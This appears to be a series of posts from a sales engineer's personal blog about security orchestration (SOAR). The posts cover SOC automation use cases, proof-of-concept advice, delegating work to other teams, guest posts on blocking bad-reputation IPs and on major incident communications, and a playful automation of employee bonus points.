A big hello from my new SOAR family at Siemplify!

It’s been a good few years helping Demisto fit into PANW (a lot of great people I’ll miss), and now I’m excited to go back to a pure focus on a core technology at Siemplify!

SocOps.rocks was always a vendor neutral, personal, unofficial, blog on my adventure as a Sales Engineer working in SOAR, nothing will change.

I still have concepts and usecases to explore and write about, so hopefully you will still find value in this blog.

Wish me luck 🙂

Andy

UseCases from the field

SOAR vendors (including the one I work for) have lots of material on the most common usecases. So today I will write about some of the more interesting and specific use cases I have built in the wild.

In no particular order:

Scheduled Active Directory Sweeps

Every x hours, SOAR search for the members of “OU=DomainAdmin” and compares to the previous result. If someone new is added, SOAR instantly removes them and create a Critical severity incident. If the security team approve, SOAR automatically replaces that member to the OU and resets the benchmark.

Result: Improved monitoring of sensitive roles in AD for unsanctioned accounts.

Impossible traveler

Tweaking the usual playbook but adding an advanced severity calculation, is the user in the OU “travelling engineer”, and is the alert location a data center? If yes just inform their manager for approval.

Result, cut down on false positives.

Leavers process += Release licence entitlement

Automating the leavers process is quite standard for SOAR (revoke in okta, AD, emails, collect hardware, etc).

The interesting twist is to auto release the Office 365 licence utilisation which was always missed before, unfortunately the organisation had a high throughput of freelancers and this was accumulating significant costs.

Result: Direct cost saving.

Alert Decoration

A security team had 4 main tools (NTA, EDR, NIDS, SIEM) and every alert meant they had to swivel chair across 4 platforms for 10 minutes to just understand the alert. SOAR would ingest from any solution, then run 1 playbook that would enrich against everything.

For every alert, 15 seconds after the alert fired they had 1 dashboard with EVERYTHING from everywhere to start investigating.

Result: Enormous time saving across every alert type, quicker time to respond, reduced analyst burnout.

Rapid turnover of tier1 staff

A MSSP SOC in Asia had had a high turnover of staff as employees trained up and quickly moved employment to get a pay rise. This causes problems with retaining a tier1 service.

I built a playbook to walk an ‘inexperienced’ analyst through a long process.

Result: Increased speed, decreased process deviation (and therefore risk), increased accuracy and customer happiness, reduced need for existing staff to babysit the newcomers.

End-to-end Phishing testing

It’s common to use SOAR to investigate phishing, but I heard of a USA customer that actually used SOAR to trigger the phishing emails at random.

This enabled the customer to correlate how many emails were sent out with how many were reported. This simplified trend analysis, tracking different departments, effectiveness of training, recipient resposne times, etc.

Result: Much tighter end to end Phishing training.

Deputise allowList approval process (and tidyup)

Using SOAR manage Allow/Exemption lists is common. For this usecase my customer wanted to deputise the approval process to the employee’s manager (we could find this querying the user in ActiveDirectory).

This approach removes the security team bottleneck and resulted in much quicker incident turn around time (everyone becomes happier). And whilst the end users (and their managers) own the process, they don’t actually have access to anything.

The other twist was that the playbook would tidyup and remove the rule after 7 days to keep things tidy.

Result: Quicker turnaround time for change requests, and auto tidy up to reduce long term risk.

Enrich existing ticketing systems with generic IT info

Any end users can create incidents in Jira/SNOW. SOAR scrapes these API for specific ticket types, pulls in every the ticket details (IP, hostname, AD username, Domain, etc) then enriches all findings against internal sources and threat intel and pushes back to the same ticket.

This gives instant added context to all tickets to all staff with no effort.

A stretch goal on this playbook could be to notify system owners when their systems are being talked about?

Results: Constant 24/7 automatic ticket enrichment supporting the whole business.

Typosquatting Domains

Here SOAR receives a daily alert from RecordedFuture on “newly registered domains that contain your corporate name”. Each new Domain was a separate SOAR incident, which collected screenshots, threat intelligence, whois, and much more straight into the TIP

Every Domain is then presented to an analyst as a 1 page executive summary allowing the team to simply decide “false positive, confirmed phishing, block in the firewall, report to Lawyers, rescan in 24 hours” etc.

Results: Increased audit history, trend analysis, and the entire existing daily process was lowered from several hours to 15 minutes.

Misconfigured Cloud Infrastructure

Stealthwatch would report on cloud instances with weak configs. The SOAR process would ingest the alert, correlate the machine name with asset management to find the system owner and email them asking them to either i) fix the mistake ii) approve the unexpected config.

The cloud instance was then rescanned and the Security team would approve the end user decision.

Results: Massive time saving, increased audit log of who approved any actions (reducing political risk to Security team).

Deobfuscate PowerShell

Customer received numerous alerts from EDR of obfuscated Powershell. SOAR playbook would ingest the alert, process the entire process tree (process name, PIDs etc), find all PowerShell commands, Base64 decode, pass strings through powershell deobfuscator, then perform IOC extraction and enrichment.

The entire incident was presented to the analyst to check over to decide if the command was innocent or ‘interesting’ and required further investigating.

Result: Big time saving of a very tedious process

Highly sensitive network – Managing alerts

A highly sensitive network with almost no access to the corporate network. When an alert was raised in the sensitive network SOAR was used to pull in all alerts, enrichment, logs, correlation etc. This ‘case study’ was converted into a report, zipped, then queue for scheduled (and heavily scrutinized) upload out of the sensitive network to the security team to investigate.

Result: Simpler process and much faster time to investigate whilst still complying with internal process

PDF Threat Report -> Microsoft Defender syntax

A security team received many cyber threat reports full of IOCs, they had to extract all IOC from the report and convert these into a very specific “Windows Defender” query syntax to initiate a network wide scan.

The SOAR playbook we built scanned the PDF, extracted every IOC and formatted them into Microsoft Defender syntax and sent the command to the network team over Slack to initiate the scan. The network team could then reply with different options to trigger different responses in the security team.

Results: Fewer missed IOC, much quicker turnaround on hunting

Validating service account usage

Members of IT staff were permitted to use service accounts, but validating/auditing each privilege escalation against the source user was a big burden on the SOC team.

A SOAR playbook was created to watch for a svc account usage/priv escalation, then enrich the log to find the employee, and finally sent them a simple yes/no question. If the end user acknowledged within 24 hours the ticket was closed, if they denied it or failed to respond in time the ticket was escalated to the SOC team to investigate further.

Result: A vital security control now takes no effort to perform and they have a completely automatic with dashboards, escalation process, etc.

Daily infrastructure testing, lots of devices

1000+ WAP and every day some crash. Solution: Ingest the device statuses from Aruba, then for each WAP identify the physical site location and which floor the WAP is on. Then identify asset owner, log a ticket in SNOW, assign to the right team etc.

Taking it forward we discussed the ability for SOAR to know if the onsite staff would need documents/help (e.g. if WAP was hidden in roof)

MSSP, reviewing user lock outs

Automate alert enrichment against the alert and the rest of the business. In addition SOAR enrichment would validate:

  • Many alerts against one account on one box? Likely an attack
  • Few alerts on different boxes, likely false positive
  • Many alerts on many boxes = password spraying

Result: Time saving (and improved service). Some customers were facing 125 lockouts in 3 days, so this adds up quickly.

MSSP: Managing IOC to EDR

Every bad inbound IOC detection needs pushing to EDR tenants, and whilst some tenants are happy with auto blocking, some are not.

We built a playbook that can enriches each tenant (against SNOW etc) to find which customer has which accepted risk profiles to push IOC automatically to the customers that allow it, but then prompt an analyst for the tenants that don’t.

Result: streamlined process, quicker time to block, improved security service.

Where do I stop, I could go on for days! But I hope this encouraged a little imagination 🙂

Andy

Apparently we’re not meant to Automate Bonusly…

Everyone in their job has a low importance, easy to forget, process driven responsibility that always get’s forgotten….

…for me that’s Bonusly.

Every month, from my employer, I am allocated 100 ‘Bonusly points’ which I can distribute to employees as a way of thanking them for going above and beyond to help.

Most months I spend them all before the end of the month, but sometimes it slips my mind. This sounds like a job for SOAR:

  • Scheduled for the end of the month
  • Prescriptive in nature (aka tedious and distracting)
  • I need to visualise at the end
  • APIs are available

High Level Needs

I want to only automate unused points, so I will run the process at the end of the month (30th) to consume anything currently unspent.

There are a list of people that help me a LOT on Slack, so I want to distribute any remaining points between that list.

Therefore I will spend 10 points per Appreciation, and repeat until points<10.

There are many ways to build this, but for today I want to keep the design as simple as possible.

We're gonna Need a montage - SouthPark Bad Time meme | Meme Generator
(joke, I can’t afford a montage clip)

Implement: Playbook

Simply, each time it runs it checks if I have more than 10 points to give, if yes then select a user and submit the Bonusly request.

You can see in this Playbook every task has the “lightning” symbol which shows each task is fully automated, i.e. no manual steps/validation.

Implement: Scheduling

As I only want to spend “unused” points I want to only trigger this at specific times, so I will use the advanced CRON timing.

For anyone that doesn’t know CRON, this essentially says:

  • Run every 30 minutes
  • Between 09:00 and 14:00
  • On the 30th of every month

Dashboarding / Visibility

I always love creating dashboards, because with automation it’s easy to lose visibility.

So I have tweaked my incident layout for a quick view on each Bonusly ‘Give’

And built a mini dashboard for trends over time (distribution is sporadic and uneven as I develop the usecase):

Results

Love: helpful people, saying thank you, SOAR

Hate: Wasting time, losing my allowance

Andy

Does Homebrew SOAR scale?

I don’t believe it does.

Short answer

“A lazy sysadmin is a good sysadmin”.

For 30 years people have been writing scripts to do our job for us, and it’s still a mess.

  • Different scripts, with different standards/styles
  • Hardcoded cleartext passwords
  • Running on different servers
  • Maintained by different teams
  • With no documentation
  • No error handling
  • No RBAC
  • No reporting/visibility
  • And when that employee leaves the organisation? All knowledge is lost

We’ve had the ability to script for 30 years and we are still in this mess.

Long Answer

Engineers typically design and build “bottom up” (rather than project owners who design “top down”).

It took only 20 minutes to get product A talking to product B”? High Five!!!

pngrepo.com
pngrepo.com

But as you add more technologies the integration permutations (not just combinations) of integrations goes exponential. 2 technologies is 2 bits of code (1 each way), 5 platforms becomes 20. You have 20 technologies to integrate? Now get ready for RESTful, SOAP, JSON, XML, Oauth, etc

As you start processing lots of incidents you realise you have lost overall visibility, so you need to engineer in dashboards, reports, alerting, all need to be both Engineer friendly and CISO friendly

Then you realise that to investigate and manage specific incidents you need full case management for particular incidents with chat, attachments, SLA timers, ownership, team members, etc

Then you realise the platform holds API keys (aka keys to the kingdom) so it needs encryption and hardening. Does this now require pentests and code reviews?

You then discover that repeatable playbook design requires UI friendly building and debugging for tasks, conditions, loops, subplaybooks, etc

As the platform grows you realise that integrating a workflow with people is equally crucial (questions over slack, email, questionnaires) so you need to bake in communication tasks, data collection, non repudiation, etc

Then you realise that Threat Intel is a huge part of incident enrichment and decision making, SOAR so you need to double up your case management to also represent each Indicator type

The business then wants to realise this huge investment by opening it to more than just SOC, but the interface isn’t overly user friendly. So you have to redesign it.

Now everyone has access you need to retrospectively add RBAC to everything

On a random Sunday night someone updates a key piece of technology, without informing you, the vendor API has changed from version 6 to version 7 and your playbooks don’t work, you have to start programming very quickly.

Then to really annoy you. management strategically change vendor alliances, so all your API calls need rewriting

…and so much more, starting to get the idea?

None of that is considered when the engineer first puts pen to paper and says “give me 20 minutes to get the basics working”.

We recently won a POC, they have been managing a home brew for years (compared to full SOAR it was tiny) and they simply got exhausted maintaining it. Every time they wanted two teak anything they had to essentially rewrite huge parts from scratch… when I showed them how SOAR has done all the basics, they realised they were fighting a losing battle.

Andy

Best Practise : How to POC/POV SOAR

“Best Practise” : commercial or professional procedures that are accepted or prescribed as being correct or most effective.

Over the last 2-3 years I’ve carried out a LOT of SOAR workshops and POC. Here are my findings:

Maturity of environment/processes/team

There are no prerequisites to using SOAR… however… SOAR was created to fix the pain. If the team does not suffer pain (yet), the value of SOAR might be hard to convey.

  • Has the prospect performed any process enough times to truly understand it? i.e. Are processes defined and understood?
  • Has the prospect identified which processes cause the most issues, and which issues? analyst burn-out, process deviation, slowness, etc
  • Has the prospect tried to create homebrew automation? And how long did they last before they realised it doesn’t scale (and unless you have the resources of Netflix, your homebrew won’t scale)

POC Success Criteria

Your SOAR project likely needs some executive sign off, and the exec team drivers are typically similar to the technical team but positioned different.

Usually the technical team want to see:

  • Speeding up time to visibility
  • Reduce clicks to resolution
  • Automate challenging processes
  • Time savings / quicker results to business
  • A reduction in stress
  • Reduced errors/deviation
  • Process enforcement
  • Alert consolidation
  • Deliver more with same team size
  • Deputise(/delegate) processes to other teams
  • More examples here

Whereas I often see executive teams have the same concerns but framed differently:

  • Strategically over the next 5 years we need to offer more services (either internal, or to customers) therefore we need to prove that SOAR can automate new business flows allowing expanded/improved service delivery…. aka automate processes
  • To comply to regulation xyz we need certain process to be enforced, full and perfect audit records…. aka process deviation and logging
  • The cost of the platform is compared directly against the cost of increasing team size (which is hard due supply/demand of skilled IT analysts/workers). Therefore for every $xxx of platform cost, you need to automate yyy Hours… aka time savings
  • etc
Interestingly, in 3 years I never hear companies say "we need to use Automation to decrease this team size to save money".  
It's always the opposite, we need to grow but we're simply unable to, it's about doing more with what you have, not doing the same with less. 

With these high level goals identified we know if POC will focus on Automation vs Case Management vs ChatOps vs TIP/TIM vs reporting and visibility vs ….

Preparation and Delays

By far, the biggest delay in any POC is internal preparation. For each technology that SOAR integrates with, we need a password/API key/private cert, we need network access. It’s not always the security/SOC/IT team who owns every technology, this often leads to big process delays. The same issue with firewall rules, network access, etc. Be prepared to power through.

The good news is I can fall back to other options if integrating with your technology isn’t possible. Here are some examples:

  • If your internal ServiceNow team are unwilling/incapable to create a dummy account for testing, create a Developers instance at SNOW direct. Their dev instances only lasts for 10 days but is great to use and abuse to prove the functionality
  • If you can’t integrate to technology <ABC> directly, consider ingesting logs via existing technology paths, e.g. SIEM
  • If integrating with Active Directory is tough, ask your SOAR vendor to provide a mock integration that generates/consumes fake data as a way to show the workflow processing and completing

Think Blueberries not Watermelons

To begin with I strongly recommend small usecases that saves you 10-20 minutes of work, multiple times a day. This quick win is easier to design and deploy, and you’ll notice the impact more. Small and often, think Blueberries.

As SOAR matures, start to consider usecases that are huge but infrequent, there is still value here but it isn’t always as quick to realise. Infrequent and huge, think watermelons.

Think C-P3O not Skynet

You might be ready for automation, but elements of the business might not. Also I find many companies don’t understand their process as much as they thought they did.
Therefore when designing a usecase, I don’t plan for SOAR to do 100% of the work and make 100% of the decisions. This would be Skynet, and Arnold Schwarzenegger will teleport from the future to stop you.

Start smaller with SOAR performing the laborious work, but not doing any decision making, use manual checks at every important step. Remember SOAR should take the arduous work away from you, allowing you to merely supervise, authorise and guide workflows.

Think C-P30

Think Avengers, not Thanos

Each time you acquire a new technology you have to decide which vendor is best. I’ve often seen companies say “product A had 92% detection, product B had 93% detection, therefore B is better we shall buy their warez”

How often do you rate a technology in it’s ability to work as a team?

In my experience, the best setups emerge when we get multiple technologies working together as a team getting the best out of each other, like the Avengers.

A technology that is 1% stronger than each of it’s competitors, but can only be operated by a human analyst will fail when compared to team work, just like Thanos did.

I hope this is helpful?

Andy

Deputising vs Delegating in SOAR

Deputization Versus Delegation
Delegating means “do this task and bring it back to me.” Deputizing means “own this process and bring me the results.”

For this article I’m going to look first at a DevOps use case, then a workload use case, and lastly a SOC usecase.

Use Case: DevOps deputising an entire process to Me

As a Sales Engineer a common workload I have is creating many cloud based POC environments. The process is quite long, and involves managing multiple platforms:

  • Deploy Virtual machine instance
  • Patch and update the software image
  • Configure basic setting
  • Allocate IP, synchronise DNS, tag the machine
  • Manage asset management, billing management
  • ….and lots more

It’s a long process, with lots of change management, it includes lots of other platforms. Our DevOps team don’t have the resources to manage this for all the SEs around the world, but also they don’t want to give me access to all the underlying platforms. So how do we manage this?

Answer: Deputise the process to the SE using automation to handle the workflow

Imagine a form that I can complete, that asks some very simple questions:

This data is fed into the “New Investigation form”:

  • Owner: Allows SOAR to automatically find and ask my manager for approval
  • AWS Region: Tells the AWS API calls where to create the POC
  • Company name: Used for billing/asset/inventory control
  • etc

In the next 4-5 minutes the playbook does all the processing for me, configuring, installing, modifying, tracking, etc. As this work is done for me, I can concentrate or more important thing elsewhere.

This is a great example of DevOps safely deputising a process to the SE team. I have no access to any equipment, yet 24/7/365 with no advance warning I can spin up my own POC environment in 5 minutes because I run the process but DevOps own it. DevOps only need to be involved where something goes wrong.

Consider your own work environment, are there any services your team would like to offer the business in a quicker/safer way without losing control?

Use Case: Delegate a single task

When running a POC I sometimes need help from an architect to complete 1 step of the process. I don’t want them to own the entire process, but I do desperately need their help for one bit.

A playbook can, automatically or by your choice (as with this example) assign specific tasks to a different team or a specific person.

If I chose “Assign Architect” the playbook takes the Right hand path and assigns the task to the Architect team. The investigation is now assigned to them, and only their user/team/role can progress through this task.

As this task belongs to a different team, I don’t want their workload to affect my SLA, so let’s create a specific SLA for just this task:

With Delegation, I own the overall process, but a particular task can be automatically given to another member of the team (with their RBAC, SLA), or even a completely different team, but the ownership of the workflow, all the graphs/dashboards and reports show that the work is still mine.

Use case: False positives and tuning a signature/policy: Delegate or Deputise?

Imagine a noisy IDS signature creating many False Positives every day, I need the signature/policy improving, and that responsibility might be with a different person/team.

This could easily be built as a simple Delegation, a single task in a playbook assigned to someone else, that is a spur or added on to the main workflow:

Deletation is good, delegation would work.

But if we change this and Deputise it we can get a more controlled process:

As the Analyst, by answering “Yes” the current investigation creates a new investigation, assigns it to someone else, but I can still track the progress from the original ticket, my own ticket.

In the below screenshot, I am “AndyAdmin” and I own the ticket to investigate the alert. From here I can see that a new incident was created to Tune the alert, I can see it was assigned to Laura and I can monitor the status.

This way:

  • The original analyst doesn’t have to wait for tuning before they can close the investigation
  • Monthly reports correctly show 2 separate tickets by the team
  • Each team has cleaner/simple SLA and dashboards
  • We can have 1-many relationships of investigations for tuning
  • Tuning investigation can be reopened cleaner (as not linked to an investigation)
  • etc

This isn’t going to win a Nobel Prize, but it is an effective way to automate the inefficient way most organisations handle assigning tickets, tasks, delegating, etc across all the different teams.

Useful?

Andy


Auto validating BitCoin Miners with SOAR [Guest Post]

They say the best way to learn is to do and this applies to nothing better than technology. As a relatively new SE at Palo Alto, I knew that if I tried to learn XSOAR by watching hours of videos and reading articles, I would never build that muscle memory that comes from repetition. With that in mind, I decided to find a use case for it and then work out how to make it do that.

After experimenting with automated jobs to block and allow kids games taught me the basics of jobs and incidents and alerting me when high risk URL categories are accessed taught me how to get log data into XSOAR, I wanted something useful. Something that would increase my security and automate a job that I simply would not have the time to carry out myself.

That Golden Goose came in the form of Bitcoin. Now, I know this sounds like the opening line of almost every crypto schill you’ve ever heard, but rest assured I’mnot going to try to sell you unicorns and crypto Rainbows. I run a Bitcoin Node at home. I don’t make any profit from it, but I believe in Bitcoin and running a node to calculate transactions on the Blockchain helps the community and ultimately the currency itself.

The Problem?

I have to open up my firewall to the entire world. Now, because I have a Palo Alto NGFW at home, I can restrict that traffic to ‘Bitcoin’ specifically and only on the default Bitcoin port, but I’m still completely open to any potentially malicious actor. Checking the reputation of IP addresses manually and then blocking those of poor repute is possible, but there are several Bitcoin connections per minute and checking each and every IP would be neither enjoyable or possible without giving up my day job and becoming a reclusive hermit living in the Jundland wastes.

This is where XSOAR came in. Due to its many integration points, I was able to instruct XSOAR to check the reputation of incoming connections in Palo Alto’s Threat Intel Autofocus and then block further connections from that IP in the future, if said IP’s reputation is poor, by adding the IP address to an externally hosted text file (EDL) that Panorama is configured to pull data from every hour. The reason an EDL is used, rather than pushing IP’s to policies, is simple; no change commit is required from Panorama, making the whole process simpler and more dynamic.

The playbook is as follows:

  • Dedupe Incidents – I noticed many connections are from the same IP address. This sub playbook recognises that fact and closes the case if the source IP has been seen within the last hour.
  • Check for source IP – Allows for a graceful end to the playbook if an IP address is not present in the log that generates the incident.
  • Send IP address to Autofocus.
  • If Reputation is good, close the incident.
  • If Reputation is bad, enrich with IPInfo for investigation, add the IP addressto an EDL that Panorama is constantly pulling data from and email me to make me aware that this has happened.

But there was a problem. My XSOAR server sounded like it was about take off after a few minutes of operation. What was happening? I didn’t take into account the sheer number of inbound connections and the processing required just to run the de-dupe playbook. I was looking at hundreds of incidents being opened per hour.

This is where pre-processing saved the day! Rather than have XSOAR spin up docker images every time a dedupe automation was needed; I added a pre-processing rule to take on some of that burden.

This is how my dashboard looked after 12 hours:

For the IP’s that fail reputation checks, the cases stay open and I receive an email notification containing the IP address and Autofocus’ verdict.

The cases are open for easy access and to allow me to investigate further if I wish, but there is nothing required from me, as the IP addresses have already been added to the text file that my Firewall is reading from for IP addresses to block.

No businesses in their right mind would run Bitcoin node in their Data Centre, but this playbook could be used for any service that has to be open to the outside world. Mail and Web servers must accept connections on port 25/80/443. They may be in your DMZ but do you know who’s attempting to connect to them? Do you check IP reputation before allowing connections to them? Using the IP enrichment info, you could also block IP ranges based on Geographical location to drastically reduce attack surface if you wish.

But it doesn’t end there. Because of XSOAR’s many integration points, these IP addresses can be shared with other technologies:Have a custom policy within Mimecast or Proofpoint for blocked IP’s? XSOAR can hook into and add to those policies for you. Using cloud security technologies? XSOAR can also have them add the IP’s to their blocked lists. XSOAR is like an Octopus amid all these disparate technologies, holding them together and orchestrating collaboration.

Ben


Amazing article, thanks Ben for the concept, your work building it, and time typing it up for everyone to read!

Andy

Major Incident Management use case [Guest Post]

Editor’s note: A massive thankyou to Patrick Bayle for today’s guest post on using a SOAR playbook to handle major incident management comms.


When does a use case be classified as something other than a use case?

When posing the question to customers I engage with, the responses are fairly typical from a small subset of common challenges focused around security incident management. Some typical examples as follows: 

  • triaging SIEM alerts
  • malware investigations
  • Phishing

And so on. It’s hard sometimes not to feel like I am a terrible game show host seeking audience participation but I would much rather this than hear crickets!

I am nothing if not prepared for such engagements and having first hand experience helps when focusing attention to the matters that would bring MOST value to the SOC and one such example is common but rarely thought of in the realms of incident handling. 

In an industry plagued with three-letter acronyms for stuff this one appears to have slipped through the net, for now at least. I have heard it described as “Major Incident Management” (MIM) or “Critical Incident Handling” (CIH). Neither the acronym nor naming convention matters in truth, yet this is one challenge that can have serious repercussions to a business not automated. Pertaining specifically to MIM/ CIH, the SOCs goal is to:

Ensure a consistent methodology is applied during a major/ critical incident and regular communications occur during the investigation of said incident. 

If you’ve ever had to firefight (metaphorically or other) then you will know that communication is often automatically placed to the bottom of the list as the priority is to fight fire (obviously). A SOC analyst has to diagnose and mitigate a threat as quickly as possible and naturally all attention is on performing this duty. Updating management slows the response and detracts from the task at hand so quite simply automation is the only option. 

How about this: a playbook that runs on a schedule and sends an email with a predefined format to a distribution list in the event of an incident that exists that matches “critical”. That would solve the problem of communication whilst ensuring that the SOC can do their thing and put the fire out as quickly as possible! Well look no further as we have a playbook for that:

The playbook logic is very simple: If there is no critical incident, then no email is sent; if there is a critical incident then the playbook generates the report at a schedule defined by the business (in my case the requirement was to update management at least every thirty minutes but this does vary). Here’s the filter on the search incident task:

And the mail received, with an attachment and a small amount of text with the incident numbers (customisable of course):


The attachment (funnily enough, also easily customised) is designed for management’s perusal. A separate email with much more detail can also be sent to the SOC manager… but this is probably unnecessary as they should be using the default XSOAR dashboard that shows them this 🙂

I have no doubt that every SOC has this need but maybe they just don’t know it yet?

My closing advice: always think broader than the two or three incidents you work on regularly or the most annoying cases you work on within the SOC. The business should know the value the SOC brings by thwarting attacks in a timely manner and easily demonstrate your value to the organisation.


Awesome post Patrick I look forward to the your next one 🙂

Andy

XKCD on SOAR metrics

Is It Worth the Time?

https://xkcd.com/1205/

That is to say that… a saving of 5 minutes, against an action that happens 5 times a day… you’re allowed to spend 4 weeks making it and still be in the green.

I’ve never spent 4 weeks purely on a use-case, that’s insane. Many playbooks I build take about ~1 day (that includes building, testing, case management, reporting, SLA metrics, etc), with some more complicated playbooks taking a few days.

I don’t recall ever needing 5-6 days, but even If I had…. that time is justified on a use case that:

  • is once a week 30 min saving (Green)
  • is daily 5 minute saving (Blue)
  • is frequent 1 minute saving (Red)

Andy

(Randall you’re awesome, keep writing those books!)